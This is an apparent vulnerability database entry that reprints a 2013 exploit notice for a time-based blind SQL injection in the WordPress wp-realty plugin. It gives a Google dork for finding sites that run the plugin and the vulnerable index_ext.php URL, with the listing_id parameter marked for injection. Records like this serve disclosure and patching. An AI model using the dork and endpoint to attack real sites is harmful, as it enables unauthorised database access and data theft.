Wordpress Plugin Realty - Blind SQL Injection

2014-07-01T00:00:00
ID SSV:82562
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                 $$$$$$\      $$\   $$\     $$$$$$\  
$$  __$$\     $$ |  $$ |   $$  __$$\ 
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\  
$$ |\_$$ |    $$  __$$ |    \____$$\ 
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/ 
 
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos


Link: http://localhost/wordpress/wp-content/plugins/wp-realty/

Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]


Credits to: Greek Hacking Scene